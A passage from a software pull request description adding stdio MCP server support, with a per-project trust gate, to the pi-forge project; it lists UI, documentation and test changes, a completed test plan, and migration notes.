- `store/mcp-store.ts` — caches `stdioTrust` per-project; new `grantStdioTrust` / `revokeStdioTrust` actions.
- `components/SettingsPanel.tsx` — `McpDraft` adds `kind`; form has Remote/Stdio radio (locked on edit); conditionally renders URL+transport+headers OR command+args+cwd+env; shared `SecretRowsEditor` for headers + env; new `StdioTrustBanner` (untrusted-empty hidden, untrusted-gated amber CTA, trusted dim with Revoke); server row renders `command args` for stdio kind.

**Docs**
- `docs/mcp.md` — full rewrite: server-kinds table, stdio example in mcp.json, field reference with kind column, "Stdio env passthrough" explainer, full "Stdio trust gate" section with rationale + grant/revoke/cascade flows, new "Connection states" table, stdio-specific troubleshooting (ENOENT/PATH passthrough), updated API surface.

**Tests**
- `tests/fixtures/mcp-stdio-fixture.mjs` (new) — minimal stdio MCP server with `echo` + `report-env` tools and a `--crash-on-start` flag.
- `tests/test-mcp-stdio.ts` (new) — **32 assertions covering**: connect/spawn → list tools → execute, bridged execute reaches subprocess, env actually passed through, env values redacted on the GET wire, sentinel round-trip on save preserves prior value, one-of url/command 400 (both / neither), crash-on-start surfaces in `error` state with lastError, project-scope stdio gated as `trust_required` with no tools, grant flips state to connected + tools appear, revoke drains the project pool, re-load after revoke re-applies the gate, project-delete cascades the trust record.

## Test plan

- [x] `npm run build` ✅
- [x] `npm run check` ✅ (typecheck + eslint + prettier)
- [x] `npm run test:ci` (minus env-fragile pty-reattach / terminal) — **29/29** ✅ including the new `test-mcp-stdio.ts`
- [x] Manual browser walkthrough — global stdio entry (`npx -y @modelcontextprotocol/server-everything`) connects and exposes tools to a session; project `.mcp.json` triggers the trust banner; grant flips to connected; revoke drains the pool. ✅

## Migration notes

- **No breaking changes.** Remote-only `.mcp.json` files are unchanged. The new stdio fields are additive.
- **Project `.mcp.json` files with existing stdio entries** (e.g. imported from Claude Desktop format — both `servers` and `mcpServers` keys are accepted) will appear as `trust_required` on first project load. Operators grant trust per-project via the Settings UI; no migration script needed.
- New API endpoints: `POST` + `DELETE /api/v1/mcp/trust/:projectId`. The `GET /api/v1/mcp/servers?projectId=…` response gains an optional `stdioTrust: { trusted: boolean }` field.

## See also

- [`docs/mcp.md`](https://github.com/Devin-Marks/pi-forge/blob/feat/mcp-stdio/docs/mcp.md) — full user/operator doc rewrite
- [`packages/server/src/mcp/stdio-trust.ts`](https://github.com/Devin-Marks/pi-forge/blob/feat/mcp-stdio/packages/server/src/mcp/stdio-trust.ts) — trust-gate rationale + threat-model framing